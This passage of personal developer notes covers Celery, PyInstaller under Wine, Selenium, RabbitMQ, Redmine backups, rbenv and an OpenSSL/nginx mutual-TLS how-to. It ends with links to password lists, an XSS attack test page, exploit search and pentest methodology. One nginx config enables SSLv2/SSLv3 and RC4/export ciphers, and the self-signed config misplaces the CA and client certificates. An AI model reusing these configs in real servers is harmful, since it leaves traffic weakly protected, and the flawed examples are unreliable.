43.11.4 Use celery with different code base in API and workers

http://stackoverflow.com/a/36977126
http://docs.celeryproject.org/en/latest/userguide/canvas.html#signatures

43.11.5 Chain tasks on celery

t1 = my_task_01.subtask((arg1,), immutable=True)
t2 = my_task_02.subtask((arg1, arg2), immutable=True)
t3 = my_task_01.subtask((arg1,), immutable=True)
task_list = [t1, t2, t3]
tasks = chain(task_list)
tasks.apply_async()

The next task will run only if the previous task ran successfully. The immutable option is set to True, so the result of each task won't be passed to the next task.

43.12 PyInstaller

https://github.com/pyinstaller/pyinstaller

43.13 Package Windows binaries while running under Linux

Sample Python code (sample.py); it is a REST application that runs with the waitress WSGI server:

$ cat ~/ws/wine/sample.py

from pycnic.core import WSGI, Handler
from waitress import serve


class Hello(Handler):
    def get(self, name="World"):
        return {"message": "Hello, %s!" % (name)}


class app(WSGI):
    routes = [
        ('/', Hello()),
        ('/([\w]+)', Hello())
    ]

serve(app, host='0.0.0.0', port=9999)

43.13.1 Install Wine

$ sudo apt-get install wine
$ winecfg

43.13.2 Install Python

# note: Download the 32bit version of python from python.org
$ wine msiexec -i ~/ws/tools/windows/python/python-2.7.13.msi ALLUSERS=1
# note: Install VCForPython27 if we want to compile some python packages from source code
$ wine msiexec /i ~/ws/tools/windows/python/VCForPython27.msi ALLUSERS=1
# Install the python dependencies of the sample program by using pip
$ cd ~/ws/wine/
$ wine ~/.wine/drive_c/Python27/python.exe ~/.wine/drive_c/Python27/Scripts/pip.exe install waitress
$ wine ~/.wine/drive_c/Python27/python.exe ~/.wine/drive_c/Python27/Scripts/pip.exe install pycnic
# Install pyinstaller
$ wine ~/.wine/drive_c/Python27/python.exe ~/.wine/drive_c/Python27/Scripts/pip.exe install pyinstaller
$ cp ~/ws/wine/sample.py ~/.wine/drive_c/users/$USER/Desktop/sample.py
$ wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile ~/.wine/drive_c/users/$USER/Desktop/sample.py
$ ls dist/
sample.exe

https://github.com/pyinstaller/pyinstaller/wiki/FAQ
https://github.com/paulfurley/python-windows-packager
https://www.paulfurley.com/packaging-python-for-windows-pyinstaller-wine/
https://stackoverflow.com/a/35605479
https://milkator.wordpress.com/2014/07/19/windows-executable-from-python-developing-in-ubuntu/
https://pythonhosted.org/PyInstaller/installation.html#installing-in-windows

43.14 Selenium

$ pip install selenium
# For `Firefox` browser download `geckodriver` at https://github.com/mozilla/geckodriver/releases
# and append the directory of `geckodriver` to the PATH:
$ export PATH=$PATH:/home/or/ws/tools/selenium

http://selenium-python.readthedocs.io/installation.html#drivers

from selenium import webdriver
from selenium.webdriver.common.keys import Keys

# create a new Firefox session
driver = webdriver.Firefox()
driver.implicitly_wait(30)
driver.maximize_window()

# navigate to the application home page
driver.get("http://www.google.com")

# get the search textbox
search_field = driver.find_element_by_id("lst-ib")
search_field.clear()

# enter search keyword and submit
search_field.send_keys("Selenium WebDriver Interview questions")
search_field.submit()

# get the list of elements which are displayed after the search
# currently on result page using find_elements_by_class_name method
lists = driver.find_elements_by_class_name("_Rm")

# get the number of elements found
print("Found " + str(len(lists)) + " searches:")

# iterate through each element and print the text that is
# the name of the search
i = 0
for item in lists:
    print(item)
    i = i + 1
    if i > 10:
        break

# close the browser window
driver.quit()

43.15 robot framework

pip install robotframework
pip install docutils
pip install robotframework-seleniumlibrary
pip install robotframework-selenium2library

Docs:

http://robotframework.org/SeleniumLibrary/SeleniumLibrary.html
http://robotframework.org/robotframework/latest/libraries/BuiltIn.html
http://robotframework.org/robotframework/latest/RobotFrameworkUserGuide.html


CHAPTER 44

RabbitMQ

Contents:

44.1 Introduction

Let's think about Rabbit as a delivery service. Your app can send and receive packages. The server with the data you need can send and receive too. The role RabbitMQ plays is as the router between your app and the "server" it's talking to. So when your app connects to RabbitMQ, it has a decision to make: am I sending or receiving? Or in AMQP talk, am I a producer or a consumer?

Producers create messages and publish (send) them to a broker server (RabbitMQ). What's a message? A message has two parts: a payload and a label. The payload is the data you want to transmit. It can be anything from a JSON array to an MPEG-4 of your favorite iguana Ziggy. RabbitMQ doesn't care. The label is more interesting. It describes the payload, and is how RabbitMQ will determine who should get a copy of your message. Unlike, for example, TCP, where you specify a specific sender and a specific receiver, AMQP only describes the message with a label (an exchange name and optionally a topic tag) and leaves it to Rabbit to send it to interested receivers based on that label. The communication is fire-and-forget and one-directional.

Consumers are just as simple. They attach to a broker server and subscribe to a queue.
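A minimal, self-contained sketch of the two roles described above, using the pika client that the following sections rely on; the queue name, host and message are illustrative:

import pika

connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
channel = connection.channel()

# Producer side: declare a queue and publish one message to it through the
# default exchange (the routing_key selects the queue).
channel.queue_declare(queue='hello')
channel.basic_publish(exchange='', routing_key='hello', body='Hello World!')

# Consumer side: subscribe to the same queue and handle deliveries.
def callback(ch, method, properties, body):
    print(" [x] Received %r" % body)

channel.basic_consume(callback, queue='hello', no_ack=True)
channel.start_consuming()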

44.2 Docker

Run RabbitMQ

$ docker run --hostname my-r1 --name r1 -p 4369:4369 -p 5671:5671 -p 5672:5672 -p 25672:25672 rabbitmq:3

Add RabbitMQ virtual host:

$ docker exec -it r1 /bin/bash
root@my-r1:/# rabbitmqctl add_vhost new_vhost
root@my-r1:/# rabbitmqctl set_user_tags guest my_new_tag
root@my-r1:/# rabbitmqctl set_permissions -p new_vhost guest ".*" ".*" ".*"

http://docs.celeryproject.org/en/latest/getting-started/brokers/rabbitmq.html#setting-up-rabbitmq

44.3 Pika

44.3.1 Exchange

A default exchange, identified by the empty string (""), will be used. The default exchange means that messages are routed to the queue with the name specified by routing_key, if it exists. (The default exchange is a direct exchange with no name.)

import pika

# Open a connection to RabbitMQ on localhost using all default parameters
connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
connection = pika.BlockingConnection(pika.ConnectionParameters(host='127.0.0.1',
                                                               virtual_host='sample_vhost',
                                                               heartbeat_interval=0))
# Open the channel
channel = connection.channel()
channel.exchange_declare(exchange='exh_01', durable=True, type='fanout')

44.3.2 Publish

channel.basic_publish(exchange='exh_01', routing_key='', body="message_01")
channel.basic_publish(exchange='exh_01', routing_key='', body="message_02")

Subscribe

44.3.3 Queue

result = channel.queue_declare(queue="queue_01", durable=True, exclusive=False, auto_delete=False)

44.3.4 Bindings

We've already created a fanout exchange and a queue. Now we need to tell the exchange to send messages to our queue. That relationship between an exchange and a queue is called a binding.

channel.queue_bind(exchange="exh_01", queue=result.method.queue)

Subscribe

def callback(ch, method, properties, body):
    print(" [x] %r" % body)

queue_name = result.method.queue
channel.basic_consume(callback, queue=queue_name, no_ack=True)
channel.start_consuming()

http://stackoverflow.com/questions/10620976/rabbitmq-amqp-single-queue-multiple-consumers-for-same-message

44.3.5 Delete Queue

$ rabbitmqctl list_queues

import pika

connection = pika.BlockingConnection(pika.ConnectionParameters('localhost', virtual_host='sample_vhost'))
channel = connection.channel()
channel.queue_delete(queue='hello')
connection.close()

https://pika.readthedocs.io/en/latest/modules/channel.html#pika.channel.Channel.queue_delete

44.3.6 Delete Exchange

$ rabbitmqctl list_exchanges

import pika

connection = pika.BlockingConnection(pika.ConnectionParameters('localhost', virtual_host='sample_vhost'))
channel = connection.channel()
channel.exchange_delete(exchange='hello')
connection.close()

http://pika.readthedocs.io/en/latest/modules/channel.html#pika.channel.Channel.exchange_delete


CHAPTER 45

Redmine

Contents:

45.1 Tips

45.1.1 Path of redmine plugins

$ /srv/redmine/plugins

45.1.2 How to install a new plugin

http://www.redmine.org/projects/redmine/wiki/Plugins

45.1.3 How to install CKEditor plugin for redmine

http://www.redmine.org/plugins/redmine-ckeditor
https://github.com/a-ono/redmine_ckeditor

$ cd /srv/redmine/plugins
$ git clone https://github.com/a-ono/redmine_ckeditor
$ cd /srv/redmine/
$ bundle install
$ bundle update
$ vim /srv/redmine/config/environments/development.rb  # set `config.eager_load = false`
$ vim /srv/redmine/config/environments/test.rb  # set `config.eager_load = false`
$ vim /srv/redmine/config/environments/production.rb  # set `config.eager_load = true`
$ rake redmine:plugins:migrate RAILS_ENV=production
$ service nginx restart


45.1.4 How to restart redmine

To restart redmine, just restart your web server

$ service nginx restart

45.1.5 How to show code changes on issues

http://www.redmine.org/boards/2/topics/21287
http://www.redmine.org/boards/2/topics/22654?r=37948
http://www.redmine.org/projects/redmine/wiki/RedmineSettings#Referencing-issues-in-commit-messages

45.1.6 Backup Redmine

Redmine backups should include:

• data (stored in your redmine database)
• attachments (stored in the files directory of your Redmine install)

Backup raw redmine mysql database:

$ /usr/bin/mysqldump -u <username> -p<password> <database> | gzip > /path/to/backup/db/redmine_`date +%y_%m_%d`.gz
$ mysqldump -u root redmine | gzip > redmine_`date +%y_%m_%d`.gz

Backup redmine mysql database with postgres compatibility format:

$ mysqldump -u root --compatible=postgresql --default-character-set=utf8 redmine | gzip > redmine_`date +%y_%m_%d`.gz

But this option may not work when you want to restore the database to postgresql, even when used with a script like: https://github.com/lanyrd/mysql-postgresql-converter

Backup the mysql redmine database with pgloader from the mysql server and restore it directly to the postgres server:

$ sudo apt-get install pgloader
$ su - postgres
postgres@debian:~$ createdb redmine
# forward the remote mysql port to the local host
$ ssh -N <user>@<mysql_host> -L 3306:localhost:3306
postgres@debian:~$ pgloader mysql://<user>:<password>@127.0.0.1/redmine postgresql:///redmine

Log of migration:

$ tail -f /tmp/pgloader/pgloader.log

Note that this warning is not important: warning: table "<table>" does not exist, skipping

https://github.com/dimitri/pgloader
http://pgloader.io/howto/pgloader.1.html
http://pgloader.io/howto/mysql.html

Download backup files:

$ scp <user>@<host>:/<path> .
$ scp <user>@<host>:/srv/redmine/files/ files

http://www.redmine.org/projects/redmine/wiki/RedmineInstall#Backups http://www.redmine.org/projects/redmine/wiki/RedmineUpgrade

45.1.7 Setup redmine with docker image

Setup redmine with docker image and restore data from backup

$ docker pull postgres
$ docker pull redmine

$ docker run --name postgres-01 -e POSTGRES_USER=postgres -e POSTGRES_PASSWORD=postgres postgres

# create redmine data base
$ createdb -U postgres -h 172.17.0.2 redmine

# restore db data to postgres
$ psql -U postgres -h 172.17.0.2 -d redmine -f redmine_backup_pg_dump.sql

$ docker run --name redmine-01 -e POSTGRES_ENV_POSTGRES_USER=postgres -e POSTGRES_ENV_POSTGRES_PASSWORD=postgres -e POSTGRES_ENV_POSTGRES_DB=redmine --link postgres-01:postgres redmine

Postgres data path is /var/lib/postgresql/data. Redmine data path is /usr/src/redmine, and two important folders within this are files and plugins.

https://github.com/docker-library/redmine
https://github.com/docker-library/redmine/blob/master/3.0/docker-entrypoint.sh
https://hub.docker.com/_/redmine/
https://hub.docker.com/_/postgres/
https://hub.docker.com/_/mysql/


CHAPTER 46

Research

Contents:

46.1 Resource

46.1.1 What’s the best server distro ?

• Five Reasons to use Debian as a Server
• Debian vs CentOS
• Debian Linux Named Most Popular Distro for Web Servers
• http://distrowatch.com


CHAPTER 47

Ruby

Contents:

47.1 Tips

47.1.1 Ruby environment

How to Use rbenv to Manage Multiple Versions of Ruby

$ aptitude install rbenv
$ aptitude install ruby-build
$ echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bash_profile
$ echo 'eval "$(rbenv init -)"' >> ~/.bash_profile
$ exec $SHELL -l
$ rbenv install 1.9.3-p545
$ rbenv rehash
$ mkdir ruby_1.9.3-p545
$ cd ruby_1.9.3-p545
$ rbenv local 1.9.3-p545
$ ruby -v
$ gem install bundler


CHAPTER 48

Security

Contents:

48.1 Tips

• WebAppSec Secure Coding Guidelines
• Django Secure

48.1.1 List of Secure Email Providers that take Privacy Serious http://freedomhacker.net/list-of-secure-email-providers-that-take-privacy-serious/ • ShazzleMail One of the most secure email providers. • Hushmail.com Canadian based company, really great and respects privacy. The leading provider in secure email. Get %25 off paid plans with code FREEDOMHACKER. • StartMail.com • Lavabit Shut down as of August 2013 (the owner cannot state why, but many reliable sources say whistle blower Edward Snowden was using it, and the court made him shut the service down.) • SilentCircle.com Mail Shut down as of August 2013. All of their other services still work. • TorGuard.net • RiseUp.net Great secure offshore provider. Non profit and fights for digital freedoms. • OpaqueMail.org • Autistici/Inventati • NeoMailBox.com • 4SecureMail.com


• CounterMail.cm • CryptoHeaven.com • S-Mail.com • Securenym.net • Safe-Mail.net • KeptPrivate.com • Novo-Ordo.com • LockBin.com • AES.io • SendINC.com Sends encrypted emails, not actually a provider, but allows full communication through your email but encrypting your email/emails. • Opolis.eu • OneShar.es – Self destructing emails • .ch • MaskMe - Great service, its not a provider, not a throwaway email provider either. Read on their page what they are about. I would recommend using this everyday with Hushmail. • TorMail.org – Service now dead.

48.1.2 How to create your own root key and root certificate

https://jamielinux.com/articles/2013/08/act-as-your-own-certificate-authority/

Copy the default /etc/ssl/openssl.cnf sample file to your custom directory:

$ cp /etc/ssl/openssl.cnf ~/my_crt

Ensure that your OpenSSL configuration file (~/my_crt/openssl.cnf) specifies dir=~/my_crt within the [ CA_default ] section.

[ CA_default]

dir= ~/my_crt

The very first cryptographic pair we generate includes what is known as a root certificate. The root key (ca.key.pem) generated in this step should be kept extremely secure, otherwise an attacker can issue valid certificates for themselves. We'll therefore protect it with AES 256-bit encryption and a strong password, just in case it falls into the wrong hands:

$ openssl genrsa -aes256 -out ca.key.pem 4096 -config ~/my_crt/openssl.cnf

Enter pass phrase for ca.key.pem: secretpassword
Verifying - Enter pass phrase for ca.key.pem: secretpassword


Open your OpenSSL configuration file (~/my_crt/openssl.cnf) and look for the [ usr_cert ] and [ v3_ca ] sections. Make sure they contain the following options:

[ usr_cert ]
# These extensions are added when 'ca' signs a request.
basicConstraints = CA:FALSE
keyUsage = nonRepudiation, digitalSignature, keyEncipherment
nsComment = "OpenSSL Generated Certificate"
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid,issuer

[ v3_ca ]
# Extensions for a typical CA
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always,issuer
basicConstraints = CA:true
keyUsage = cRLSign, keyCertSign

Now you can use the root key above to issue a root certificate (ca.cert.pem). In this example, the certificate is set to expire in ten years. As this is a CA certificate, use the v3_ca extension. You will be prompted for some responses, which you can fill with whatever you like. For convenience, defaults can be set in the openssl configuration file. The default digest is SHA-1. SHA-1 is considered insecure. Pass the -sha256 option to use a more secure digest.

$ openssl req -new -x509 -days 365 -key ca.key.pem \ -sha256 -extensions v3_ca -out ca.cert.pem -config ~/my_crt/openssl.cnf

Enter pass phrase for ca.key.pem:
You are about to be asked to enter information that will be incorporated
into your certificate request.
-----
Country Name (2 letter code) [XX]:GB
State or Province Name (full name) []:London
Locality Name (eg, city) [Default City]:London
Organization Name (eg, company) [Default Company Ltd]:Alice CA
Organizational Unit Name (eg, section) []:
Common Name (eg, your name or your server's hostname) []:Alice CA
Email Address []:[email protected]

Armed with your root key (ca.key.pem) and root certificate (ca.cert.pem), you are now ready to optionally create an intermediate certificate authority.

48.1.3 How to generate a certificate signing request (CSR)

https://gist.github.com/mtigas/952344

$ openssl genrsa -aes256 -out client.key 4096 -config ~/my_crt/openssl.cnf
$ openssl req -new -key client.key -out client.csr

# self-signed
$ openssl x509 -req -days 365 -in client.csr -CA ca.cert.pem -CAkey ca.key.pem -set_serial 01 -out client.crt


48.1.4 Convert Client Key to PKCS

$ openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.p12

48.1.5 Mutual Authentication

With des3:

$ openssl genrsa -des3 -out ca.key 4096
$ openssl req -new -x509 -days 365 -key ca.key -out ca.crt
$ openssl genrsa -des3 -out server.key 1024
$ openssl req -new -key server.key -out server.csr
$ openssl x509 -req -days 365 -in server.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out server.crt
$ openssl genrsa -des3 -out client.key 1024
$ openssl req -new -key client.key -out client.csr
$ openssl x509 -req -days 365 -in client.csr -CA ca.crt -CAkey ca.key -set_serial 02 -out client.crt
$ openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.p12

With aes256 and some more options:

$ openssl genrsa -aes256 -out ca.key 4096 -config openssl.cnf
$ openssl req -new -x509 -days 365 -key ca.key -sha256 -extensions v3_ca -out ca.crt -config openssl.cnf
$ openssl genrsa -aes256 -out server.key 4096 -config openssl.cnf
$ openssl req -new -key server.key -sha256 -extensions v3_ca -out server.csr -config openssl.cnf
$ openssl x509 -req -days 365 -in server.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out server.crt -sha256 -extfile server_extKey.cnf
$ openssl genrsa -aes256 -out client.key 4096 -config openssl.cnf
$ openssl req -new -key client.key -sha256 -extensions v3_ca -out client.csr -config openssl.cnf
$ openssl x509 -req -days 365 -in client.csr -CA ca.crt -CAkey ca.key -set_serial 02 -out client.crt -sha256 -extfile client_extKey.cnf
$ openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.p12

# client_extKey.cnf
extendedKeyUsage = critical, clientAuth
keyUsage = critical, digitalSignature, keyEncipherment

# server_extKey.cnf
keyUsage = critical, digitalSignature, keyEncipherment

# Verify Server Certificate
$ openssl verify -purpose sslserver -CAfile ca.crt server.crt
# Verify Client Certificate
$ openssl verify -purpose sslclient -CAfile ca.crt client.crt

$ curl -v -s -k --key client.key --cert client.crt https://termestudio.com/

server {
    server_name localhost;
    root html;
    index index.html index.htm;

    listen 443;
    ssl on;
    ssl_certificate /etc/nginx/certs/server.crt;
    ssl_certificate_key /etc/nginx/certs/server.key;
    ssl_client_certificate /etc/nginx/certs/ca.crt;
    ssl_verify_client on;
    ssl_verify_depth 2;
    ssl_session_timeout 5m;
    ssl_protocols SSLv2 SSLv3 TLSv1;
    ssl_ciphers ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP;
    ssl_prefer_server_ciphers on;
}

# openssl.cnf # # OpenSSL example configuration file. # This is mostly being used for generation of certificate requests. #

# This definition stops the following lines choking if HOME isn't # defined. HOME=. RANDFILE= $ENV::HOME/.rnd

# Extra OBJECT IDENTIFIER info: #oid_file = $ENV::HOME/.oid oid_section= new_oids

# To use this configuration file with the "-extfile" option of the # "openssl x509" utility, name here the section containing the # X.509v3 extensions to use: # extensions = # (Alternatively, use a configuration file that has only # X.509v3 extensions in its main [= default] section.)

[ new_oids]

# We can add new OIDs in here for use by 'ca', 'req' and 'ts'. # Add a simple OID like this: # testoid1=1.2.3.4 # Or use config file substitution like this: # testoid2=${testoid1}.5.6

# Policies used by the TSA examples. tsa_policy1=1.2.3.4.1 tsa_policy2=1.2.3.4.5.6 tsa_policy3=1.2.3.4.5.7

#################################################################### [ ca] default_ca= CA_default # The default ca section

#################################################################### [ CA_default] dir= /home/or/workspace/prj/me/TS/crt # Where everything is kept (continues on next page)


(continued from previous page) certs= $dir/certs # Where the issued certs are kept crl_dir= $dir/crl # Where the issued crl are kept database= $dir/index.txt # database index file. #unique_subject = no # Set to 'no' to allow creation of # several ctificates with same subject. new_certs_dir= $dir/newcerts # default place for new certs. certificate= $dir/cacert.pem # The CA certificate serial= $dir/serial # The current serial number crlnumber= $dir/crlnumber # the current crl number # must be commented out to leave a V1 CRL crl= $dir/crl.pem # The current CRL private_key= $dir/private/cakey.pem# The private key RANDFILE= $dir/private/.rand # private random number file x509_extensions= usr_cert # The extentions to add to the cert

# Comment out the following two lines for the "traditional" # (and highly broken) format. name_opt= ca_default # Subject Name options cert_opt= ca_default # Certificate field options

# Extension copying option: use with caution. # copy_extensions = copy

# Extensions to add to a CRL. Note: Netscape communicator chokes on V2 CRLs # so this is commented out by default to leave a V1 CRL. # crlnumber must also be commented out to leave a V1 CRL. # crl_extensions = crl_ext default_days= 365 # how long to certify for default_crl_days= 30 # how long before next CRL default_md= default # use public key default MD preserve= no # keep passed DN ordering

# A few difference way of specifying how similar the request should look # For type CA, the listed attributes must be the same, and the optional # and supplied fields are just that :-) policy= policy_match

# For the CA policy [ policy_match] countryName= match stateOrProvinceName= match organizationName= match organizationalUnitName= optional commonName= supplied emailAddress= optional

# For the 'anything' policy # At this point in time, you must list all acceptable 'object' # types. [ policy_anything] countryName= optional stateOrProvinceName= optional localityName= optional organizationName= optional (continues on next page)


organizationalUnitName= optional
commonName= supplied
emailAddress= optional

#################################################################### [ req] default_bits= 2048 default_keyfile= privkey.pem distinguished_name= req_distinguished_name attributes= req_attributes x509_extensions= v3_ca # The extentions to add to the self signed cert

# Passwords for private keys if not present they will be prompted for # input_password = secret # output_password = secret

# This sets a mask for permitted string types. There are several options. # default: PrintableString, T61String, BMPString. # pkix : PrintableString, BMPString (PKIX recommendation before 2004) # utf8only: only UTF8Strings (PKIX recommendation after 2004). # nombstr : PrintableString, T61String (no BMPStrings or UTF8Strings). # MASK:XXXX a literal mask value. # WARNING: ancient versions of Netscape crash on BMPStrings or UTF8Strings. string_mask= utf8only

# req_extensions = v3_req # The extensions to add to a certificate request

[ req_distinguished_name] countryName= Country Name(2 letter code) countryName_default=AU countryName_min=2 countryName_max=2 stateOrProvinceName= State or Province Name(full name) stateOrProvinceName_default= Some-State localityName= Locality Name(eg, city)

0.organizationName= Organization Name(eg, company) 0.organizationName_default= Internet Widgits Pty Ltd

# we can do this but it is not needed normally :-) #1.organizationName = Second Organization Name (eg, company) #1.organizationName_default = World Wide Web Pty Ltd organizationalUnitName= Organizational Unit Name(eg, section) #organizationalUnitName_default = commonName= Common Name(e.g. server FQDN or YOUR name) commonName_max= 64 emailAddress= Email Address emailAddress_max= 64

# SET-ex3 = SET extension number 3

[ req_attributes]


(continued from previous page) challengePassword= A challenge password challengePassword_min=4 challengePassword_max= 20 unstructuredName= An optional company name

[ usr_cert]

# These extensions are added when 'ca' signs a request.

# This goes against PKIX guidelines but some CAs do it and some software # requires this to avoid interpreting an end user certificate as a CA. basicConstraints=CA:FALSE

# Here are some examples of the usage of nsCertType. If it is omitted # the certificate can be used for anything *except* object signing.

# This is OK for an SSL server. # nsCertType = server

# For an object signing certificate this would be used. # nsCertType = objsign

# For normal client use this is typical # nsCertType = client, email

# and for everything including object signing: # nsCertType = client, email, objsign

# This is typical in keyUsage for a client certificate. keyUsage= nonRepudiation, digitalSignature, keyEncipherment

# This will be displayed in Netscape's comment listbox. nsComment= "OpenSSL Generated Certificate"

# PKIX recommendations harmless if included in all certificates. subjectKeyIdentifier=hash authorityKeyIdentifier=keyid,issuer

# This stuff is for subjectAltName and issuerAltname. # Import the email address. # subjectAltName=email:copy # An alternative to produce certificates that aren't # deprecated according to PKIX. # subjectAltName=email:move

# Copy subject details # issuerAltName=issuer:copy

#nsCaRevocationUrl = http://www.domain.dom/ca-crl.pem #nsBaseUrl #nsRevocationUrl #nsRenewalUrl #nsCaPolicyUrl #nsSslServerName



# This is required for TSA certificates.
extendedKeyUsage= critical,timeStamping

[ v3_req]

# Extensions to add to a certificate request basicConstraints= CA:FALSE keyUsage= nonRepudiation, digitalSignature, keyEncipherment

[ v3_ca]

# Extensions for a typical CA

# PKIX recommendation. subjectKeyIdentifier=hash authorityKeyIdentifier=keyid:always,issuer

# This is what PKIX recommends but some broken software chokes on critical # extensions. basicConstraints= critical,CA:true # So we do this instead. #basicConstraints = CA:true

# Key usage: this is typical for a CA certificate. However since it will # prevent it being used as an test self-signed certificate it is best # left out by default. keyUsage= cRLSign, keyCertSign

# Some might want this also # nsCertType = sslCA, emailCA

# Include email address in subject alt name: another PKIX recommendation # subjectAltName=email:copy # Copy issuer details # issuerAltName=issuer:copy

# DER hex encoding of an extension: beware experts only! # obj=DER:02:03 # Where 'obj' is a standard or added object # You can even override a supported extension: # basicConstraints= critical, DER:30:03:01:01:FF #extendedKeyUsage = critical, clientAuth

[ crl_ext]

# CRL extensions. # Only issuerAltName and authorityKeyIdentifier make any sense in a CRL.

# issuerAltName=issuer:copy
authorityKeyIdentifier=keyid:always



[ proxy_cert_ext] # These extensions should be added when creating a proxy certificate

# This goes against PKIX guidelines but some CAs do it and some software # requires this to avoid interpreting an end user certificate as a CA. basicConstraints=CA:FALSE

# Here are some examples of the usage of nsCertType. If it is omitted # the certificate can be used for anything *except* object signing.

# This is OK for an SSL server. # nsCertType = server

# For an object signing certificate this would be used. # nsCertType = objsign

# For normal client use this is typical # nsCertType = client, email

# and for everything including object signing: # nsCertType = client, email, objsign

# This is typical in keyUsage for a client certificate. # keyUsage = nonRepudiation, digitalSignature, keyEncipherment

# This will be displayed in Netscape's comment listbox. nsComment= "OpenSSL Generated Certificate"

# PKIX recommendations harmless if included in all certificates. subjectKeyIdentifier=hash authorityKeyIdentifier=keyid,issuer

# This stuff is for subjectAltName and issuerAltname. # Import the email address. # subjectAltName=email:copy # An alternative to produce certificates that aren't # deprecated according to PKIX. # subjectAltName=email:move

# Copy subject details # issuerAltName=issuer:copy

#nsCaRevocationUrl = http://www.domain.dom/ca-crl.pem #nsBaseUrl #nsRevocationUrl #nsRenewalUrl #nsCaPolicyUrl #nsSslServerName

# This really needs to be in place for it to be a proxy certificate. proxyCertInfo=critical,language:id-ppl-anyLanguage,pathlen:3,policy:foo

#################################################################### [ tsa]



default_tsa= tsa_config1 # the default TSA section

[ tsa_config1]

# These are used by the TSA reply generation only. dir= ./demoCA # TSA root directory serial= $dir/tsaserial # The current serial number (mandatory) crypto_device= builtin # OpenSSL engine to use for signing signer_cert= $dir/tsacert.pem # The TSA signing certificate # (optional) certs= $dir/cacert.pem # Certificate chain to include in reply # (optional) signer_key= $dir/private/tsakey.pem # The TSA private key (optional)

default_policy= tsa_policy1 # Policy if request did not specify it # (optional) other_policies= tsa_policy2, tsa_policy3 # acceptable policies (optional) digests= md5, sha1 # Acceptable message digests (mandatory) accuracy= secs:1, millisecs:500, microsecs:100 # (optional) clock_precision_digits=0 # number of digits after dot. (optional) ordering= yes # Is ordering defined for timestamps? # (optional, default: no) tsa_name= yes # Must the TSA name be included in the reply? # (optional, default: no) ess_cert_id_chain= no # Must the ESS cert id chain be included? # (optional, default: no)

Note about common name:

Common Name (e.g. server FQDN or YOUR name) []: example.local

The Common Name option is the most important, as the domain used with the certificate needs to match it. If you use the "www" subdomain, this means specifying the "www" subdomain as well!

Note about serial number:

This error (Error code: sec_error_reused_issuer_and_serial) occurred in a firefox page with this description: "Your certificate contains the same serial number as another certificate issued by the certificate authority. Please get a new certificate containing a unique serial number." It happens when the serial number for the client and the CA is the same.

Resources:

https://www.openssl.org/docs/apps/x509v3_config.html
https://tech.mendix.com/linux/2014/10/29/nginx-certs-sni/
https://serversforhackers.com/ssl-certs/
http://stackoverflow.com/questions/1402699/bad-openssl-certificate
http://stackoverflow.com/questions/19726138/openssl-error-18-at-0-depth-lookupself-signed-certificate
https://github.com/nategood/sleep-tight/blob/master/scripts/create-certs.sh
http://stackoverflow.com/questions/20767548/nginx-subdomain-ssl-redirect-redirects-top-level-domain


48.1.6 Self Sign Authentication

$ openssl genrsa -out ca.key 4096
$ openssl req -new -x509 -days 365 -key ca.key -out ca.crt
$ openssl genrsa -out client.key 4096
$ openssl req -new -key client.key -out client.csr
$ openssl x509 -req -days 365 -in client.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out client.crt
$ openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.p12

server {
    server_name localhost;
    root html;
    index index.html index.htm;

    listen 443;
    ssl on;
    ssl_certificate /etc/nginx/certs/ca.crt;
    ssl_certificate_key /etc/nginx/certs/ca.key;
    ssl_client_certificate /etc/nginx/certs/client.crt;
    ssl_verify_client on;

    ssl_session_timeout 5m;
    ssl_protocols SSLv3 TLSv1 TLSv1.1 TLSv1.2;
    ssl_ciphers "HIGH:!aNULL:!MD5 or HIGH:!aNULL:!MD5:!3DES";
    ssl_prefer_server_ciphers on;

    location / {
        try_files $uri $uri/ =404;
    }
}

Resources:

https://gist.github.com/eliangcs/6316574
https://gist.github.com/twined/cfdaa968223c9e293b59
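To check that client-certificate verification actually works, a quick test (a small sketch; the host name and file paths are assumptions based on the config above):

# Without the client certificate nginx should reject the request
$ curl -k https://localhost/

# With the client certificate and key the page should be served
$ curl -k --cert client.crt --key client.key https://localhost/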

48.1.7 Can I build my own Extended Validation (EV) SSL certificate?

http://serverfault.com/questions/48053/can-i-build-my-own-extended-validation-ssl-certificate
http://stackoverflow.com/questions/10950014/green-bar-for-self-made-ssl
https://www.sslshopper.com/cheapest-ev-ssl-certificates.html
http://en.wikipedia.org/wiki/Extended_Validation_Certificate
http://stackoverflow.com/questions/8455113/firefox-ssl-you-are-connected-to-whatever-com-which-is-run-by-unknown

48.1.8 Using shadowsocks

https://github.com/shadowsocks/shadowsocks
https://xuri.me/2014/08/14/shadowsocks-setup-guide.html


48.1.9 JSON Web Token

JSON Web Token is a fairly new standard which can be used for token-based authentication. Unlike the built-in TokenAuthentication scheme, JWT authentication doesn't need to use a database to validate a token.

http://www.django-rest-framework.org/api-guide/authentication/#json-web-token-authentication

JWT (JSON Web Token) vs. custom token:

http://stackoverflow.com/a/31737111
http://getblimp.github.io/django-rest-framework-jwt/
https://jwt.io/introduction/
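A minimal sketch of the idea using the PyJWT library (the secret and payload are illustrative): the server validates a token purely by checking its signature, so no database lookup is needed.

import jwt

SECRET = "change-me"  # shared signing key; keep it out of source control

# Issue a token for a user
token = jwt.encode({"user_id": 42}, SECRET, algorithm="HS256")

# Later, any server that knows SECRET can validate the token without a database
payload = jwt.decode(token, SECRET, algorithms=["HS256"])
print(payload["user_id"])  # 42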

48.2 Links

48.2.1 Password list

https://wiki.skullsecurity.org/Passwords
https://dazzlepod.com/uniqpass/

48.2.2 XSS

https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
http://htmlpurifier.org/live/smoketests/xssAttacks.php

48.2.3 Online exploit search

https://exploits.shodan.io/welcome

48.2.4 Search engine for Internet-connected devices

https://www.shodan.io/

48.3 Penetration

48.3.1 Penetration testing methodology

http://www.0daysecurity.com/penetration-testing/penetration.html

• Discovery & Probing
• Enumeration
